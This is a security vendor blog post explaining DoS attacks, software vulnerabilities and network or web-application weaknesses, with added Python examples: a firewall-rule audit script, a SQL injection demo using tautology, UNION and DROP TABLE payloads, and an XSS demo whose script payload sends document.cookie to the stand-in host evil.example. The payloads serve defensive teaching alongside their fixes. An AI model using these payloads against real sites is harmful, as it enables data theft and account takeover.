In the first part of “Security Threats: The Who, The How, and The Why,” we discussed the Who aspect, dissecting the three main classifications of attackers: the Script Kiddie, Insiders, and Juggernauts.
This blog will cover the How aspect of today’s threat landscape, providing some tips and tricks to ensure that your network is protected as much as possible. The Why will be following in our third and final installment.
How do the Script Kiddies, Insiders, and Juggernauts penetrate your system?
- Denial of Service (DoS)
- Vulnerability
- Weakness
A DoS attack is an attempt to make a service unreachable. The primary impact of DoS is financial. If the company makes money from its website, having the site down results in lost revenue. Alternatively, if the website is hosted by a Content Distribution Network (CDN) or another provider with enough bandwidth and server resources to simply absorb the extra traffic, the resources consumed by the attack will likely show up as a very large bill at the end of the month. DoS attacks were historically motivated by Lulz, such as the incident in February 2000 when a Canadian high school student successfully attacked Yahoo, CNN, Amazon, and a few other high-profile sites, knocking them offline. The perpetrator claimed in a 2008 book that the attacks were part of an attempt to establish a reputation for himself and his “cybergang.” Starting in 2008, the Internet vigilante group Anonymous adopted DoS attacks as a form of protest or even punishment against businesses and government agencies. In January 2012, several US Government agency websites were attacked, as were content industry organizations such as the RIAA and MPAA, in protest over the SOPA and PIPA bills and the DOJ/FBI raid on the file-sharing site MegaUpload. Unfortunately, recent research shows that DoS is inexpensive for attackers: it is available as a service, with prices around $5/hour, $40/day, and $900/month. Presumably, these DoS services use botnets (networks of infected PCs) to keep their own costs down. Anonymous uses a slightly different method, crowd-sourcing its DoS attacks through software it makes available for anyone to download.

A vulnerability is a flaw in pre-built software: a bug in the OS, in an application, in a middleware package, and so on. The key differentiator of a vulnerability is that it’s typically not something the end user or administrator can “fix” themselves.
While workarounds are sometimes available, the true “fix” comes in the form of a patch from the vendor or supplier. Vulnerabilities are a common attack vector because they have a high probability of success across a large number of targets, so the attack can be automated into a Script Kiddie tool or a virus. Security researcher RSnake discovered a vulnerability in the Apache web server, which is very widely used across the Internet: the server holds a worker open for each slow, incomplete HTTP request, so a single low-bandwidth client that trickles partial headers over many connections can exhaust every worker. His proof-of-concept tool, Slowloris, has since become a popular tool for DoS attacks against those servers.

One problem with vulnerabilities is that users must wait for a patch from the vendor, and not all vendors are quick to produce one. In April 2012, it was revealed that industrial-control vendor RuggedCom had a serious vulnerability in the form of an undocumented backdoor account, which would allow an attacker complete control of the equipment. It was also revealed that the vulnerability had been reported to the vendor a full year earlier; the public announcement came only after the company ignored multiple requests for a commitment to provide a fix. Although a fix was quickly released, its sudden priority was likely prompted by a large, and now angry, portion of their customer base. Other vendors take the opposite approach, actively soliciting vulnerability reports about their products by offering cash rewards.

Good patch management, timely and thorough, is the best way to reduce your vulnerability profile. If an attacker’s automated scan of your network doesn’t return any potential vulnerabilities, you’ve lifted yourself out of the “low hanging fruit” category. For more information on vulnerabilities, or to search a comprehensive list, a good starting point is MITRE’s Common Vulnerabilities and Exposures (CVE) list.
A weakness is a flaw in the implementation of your own network and systems. The bad news about weaknesses is that this is the largest category, spanning everything from firewall policies to service architectures to web application coding errors, so you’re unlikely to find them all. The good news is that, unlike a vulnerability, a weakness is something someone in your organization can fix without waiting on a vendor.
On the network side, a common weakness is mistakes in firewall policies. One example is allowing direct access from the Internet to a database or to Windows Remote Desktop. Those kinds of services should at a minimum be protected by a VPN and by explicit policies specifying which clients may reach which servers. Even if the services are “hardened” against attack, a newly discovered vulnerability in them would create the risk of a breach. Even worse, firewall policies that allow Internet traffic to reach those sensitive services also allow automated scan tools to discover them, which makes your network a more attractive target.
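As an added illustration (not code from the original post or from WildPackets), the following script audits a firewall ruleset for exactly this weakness. It parses a constructed sample in iptables-save syntax, treats a rule with no `-s` match as reachable from 0.0.0.0/0, and flags any ACCEPT rule that lets non-RFC 1918 sources reach a port on a hypothetical “VPN-only” list; the two corrected rules that admit only the VPN client pool pass. The port list, the 10.8.0.0/24 VPN pool and the sample rules are all assumptions made for the example.

```python
import ipaddress

# Hypothetical policy list for this example: services that should only be
# reachable through the VPN, never directly from the Internet.
SENSITIVE_PORTS = {
    3389: "Windows Remote Desktop",
    1433: "Microsoft SQL Server",
    3306: "MySQL",
    5432: "PostgreSQL",
}

# Address space treated as "inside" (RFC 1918). A source match that does not lie
# within one of these ranges, including the implicit 0.0.0.0/0 of a rule with
# no -s option, is considered Internet-facing.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample ruleset in iptables-save syntax; not from any real network.
# The first two rules are the weakness (RDP and MySQL open to the world); the
# next two are the corrected policy, admitting only the VPN client pool 10.8.0.0/24.
SAMPLE_RULES = """\
-A INPUT -p tcp -m tcp --dport 3389 -j ACCEPT
-A INPUT -s 0.0.0.0/0 -p tcp -m tcp --dport 3306 -j ACCEPT
-A INPUT -s 10.8.0.0/24 -p tcp -m tcp --dport 3389 -j ACCEPT
-A INPUT -s 10.8.0.0/24 -p tcp -m tcp --dport 3306 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 443 -j ACCEPT
-A INPUT -s 203.0.113.0/24 -p tcp -m tcp --dport 5432 -j DROP
"""


def parse_rule(line):
    """Parse the subset of iptables-save syntax used above.

    Returns a dict with chain, src, port and target, or None when the line is
    not an ACCEPT rule that matches a destination port. A rule without -s
    matches any source, so the default is 0.0.0.0/0.
    """
    toks = line.split()
    rule = {"chain": None, "src": "0.0.0.0/0", "port": None, "target": None}
    i = 0
    while i < len(toks):
        tok = toks[i]
        if tok == "-A":
            rule["chain"] = toks[i + 1]
            i += 2
        elif tok == "-s":
            rule["src"] = toks[i + 1]
            i += 2
        elif tok == "--dport":
            rule["port"] = int(toks[i + 1])
            i += 2
        elif tok == "-j":
            rule["target"] = toks[i + 1]
            i += 2
        else:
            i += 1  # -p tcp, -m tcp and anything else the audit does not need
    if rule["target"] != "ACCEPT" or rule["port"] is None:
        return None
    return rule


def is_internet_reachable(src):
    """True unless the source match lies entirely inside one internal range."""
    net = ipaddress.ip_network(src, strict=False)
    return not any(net.subnet_of(internal) for internal in INTERNAL_NETS)


def audit(ruleset):
    """Return (line, port, service) for every ACCEPT rule that lets Internet
    sources reach a sensitive port. Non-ACCEPT lines and other ports are ignored."""
    findings = []
    for line in ruleset.splitlines():
        rule = parse_rule(line)
        if rule is None or rule["port"] not in SENSITIVE_PORTS:
            continue
        if is_internet_reachable(rule["src"]):
            findings.append((line, rule["port"], SENSITIVE_PORTS[rule["port"]]))
    return findings


if __name__ == "__main__":
    for line, port, service in audit(SAMPLE_RULES):
        print(f"EXPOSED {service} (tcp/{port}): {line}")
```

The check deliberately ignores rule ordering, connection-tracking state and negated matches (`! -s`), so a DROP placed earlier in the chain would not suppress a finding; treat its output as a list of rules to review rather than a verdict, and run the same audit against the policies on your perimeter devices, not only on Linux hosts.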
On the server side, weaknesses start with everything on the OWASP Top 10, plus the much larger set on MITRE’s Common Weakness Enumeration (CWE) list.
The best known kind of web application weakness is “Injection,” especially SQL Injection. Injection occurs when an attacker is able to pass commands through the application to a back-end system such as a database. Input validation, parameterized queries, and output encoding can prevent injection: an application should never trust input from a user, and should never splice that input into a query or command as if it were part of the program.
One common SQL Injection scenario occurs when the attacker types SQL into a text field on a web page. If the web application passes that text directly into a query, the database parses it as SQL and executes the attacker’s commands. Possible results include displaying a list of all customers, or deleting that list from the database. A more extreme example would be creating a new administrative account, giving the attacker persistent privileged access and full control of the database server. Having escalated themselves to Insiders, the attackers can then launch new attacks deeper into the network from that compromised system.
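The scenario above, as an added example that is not part of the original post: a customer lookup written by string concatenation beside the same lookup as a parameterized query, run against a constructed in-memory SQLite database. The tautology payload dumps every customer through the vulnerable version, and a UNION payload reads the (constructed) `users` table through it; the parameterized version returns nothing for either, because the driver sends the value separately and the database never parses it as SQL. An allowlist check on the name field is included as defense in depth. Table names, sample rows and hashes are all made up for the example.

```python
import re
import sqlite3

# Constructed sample data for the example; not real customer or account records.
CUSTOMERS = [
    ("alice", "alice@example.com"),
    ("bob", "bob@example.com"),
    ("carol", "carol@example.com"),
]
USERS = [
    ("admin", "$2b$12$constructed-hash-for-the-example"),
    ("support", "$2b$12$another-constructed-hash"),
]


def build_db():
    """In-memory SQLite database standing in for the application's back end."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO customers (name, email) VALUES (?, ?)", CUSTOMERS)
    conn.executemany("INSERT INTO users (username, password_hash) VALUES (?, ?)", USERS)
    return conn


def lookup_vulnerable(conn, name):
    """The weakness: user text is spliced into the SQL string, so the database
    parses whatever the attacker typed as part of the query."""
    sql = "SELECT name, email FROM customers WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    """The fix: a parameterized query. The driver sends the value separately
    from the statement text, so it can only ever be compared, never executed."""
    sql = "SELECT name, email FROM customers WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


# Defense in depth: an allowlist for the field. Rejecting anything that is not a
# plausible customer name stops the payloads below before they reach the database.
NAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def is_valid_name(name):
    return NAME_RE.match(name) is not None


# Two classic payloads an attacker might type into the "customer name" box.
TAUTOLOGY = "' OR '1'='1"                                        # dumps every customer
UNION = "x' UNION SELECT username, password_hash FROM users --"  # reads another table


if __name__ == "__main__":
    conn = build_db()
    print("normal:", lookup_vulnerable(conn, "alice"))
    print("tautology, vulnerable:", lookup_vulnerable(conn, TAUTOLOGY))
    print("union, vulnerable:", lookup_vulnerable(conn, UNION))
    print("tautology, parameterized:", lookup_safe(conn, TAUTOLOGY))
    print("union, parameterized:", lookup_safe(conn, UNION))
```

A stacked payload such as `'; DROP TABLE customers; --` happens not to work here only because Python’s sqlite3 module refuses to run more than one statement per `execute()` call; many other database drivers do not, so that is not a defense to rely on. The parameterized query is the fix; the allowlist is a second layer that also keeps junk out of the data.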
Injection can also occur with HTML, where it’s referred to as Cross-Site Scripting (XSS). On a site vulnerable to stored XSS, the attacker enters HTML or JavaScript into a text box. When the next user, the victim, views that page, the site displays the “text,” which the browser interprets as a trusted part of the page and executes. This is a common way to steal session cookies, which often lets the attacker take over the victim’s account on that site. On Facebook, the result is Lulz. On a banking site, the result is theft.
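The stored-XSS case above, as an added example that is not from the original post: a comment renderer that interpolates user text straight into the page, beside one that encodes for the HTML context with `html.escape`. Two constructed payloads are used, a script tag in the comment body that would ship `document.cookie` to an attacker host, and an author name that tries to break out of a quoted attribute with an event handler. The template, the payloads and the `evil.example` host are assumptions made for the example.

```python
import html

# Constructed attacker inputs for the example. The comment body carries a script
# that ships the victim's cookie to an attacker-controlled host; the author field
# tries to break out of a quoted attribute with an event handler.
SCRIPT_PAYLOAD = "<script>new Image().src='http://evil.example/c?'+document.cookie</script>"
ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)'


def render_unsafe(author, comment):
    """The weakness: stored user text is interpolated straight into the page.
    The browser cannot tell the attacker's markup from the site's own."""
    return f'<p data-author="{author}">{comment}</p>'


def render_safe(author, comment):
    """The fix: encode for the context the text lands in. html.escape with
    quote=True covers both the text node and the double-quoted attribute."""
    return (f'<p data-author="{html.escape(author, quote=True)}">'
            f'{html.escape(comment, quote=True)}</p>')


def has_active_markup(fragment):
    """Crude tripwire, specific to the one-attribute template above, used only
    to contrast the two renderings: does the fragment still contain a script
    tag, or more quote characters than the two that delimit data-author (which
    means an attribute-context payload started a new attribute)?"""
    lowered = fragment.lower()
    return "<script" in lowered or fragment.count('"') != 2


if __name__ == "__main__":
    for author, comment in (("mallory", SCRIPT_PAYLOAD), (ATTR_PAYLOAD, "hello")):
        print("unsafe:", render_unsafe(author, comment))
        print("safe:  ", render_safe(author, comment))
```

Encoding is context-specific: `html.escape` is right for HTML text and quoted attributes, but not for text landing inside a `<script>` block or a URL, which need their own encoders. Marking the session cookie `HttpOnly` is a worthwhile second layer, since a script that does run then cannot read `document.cookie`, although it does nothing about actions the script performs directly on the victim’s behalf.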
Given the range of possibilities for weaknesses, the risk to the business may be substantial, but the effort to find them may be large. A penetration test – commissioning an attack against your own network – is a useful tool to get a sample of what kinds of weaknesses exist, and then start remediating that type of weakness across the network.
Understanding the Who and the How are key parts of staying one step ahead of potential network security threats. In the final post of this series, we will delve into the Why, discussing the three most common motivations behind cyber attacks.
Author Profile - Jim MacLeod is a Product Manager at WildPackets. He has been in the networking industry since 1994, and started doing protocol analysis in 1996. His experience includes positions in firewall and VPN setup and policy analysis, log management, Internet filtering, anti-spam, intrusion detection, network monitoring and control, and of course packet sniffing.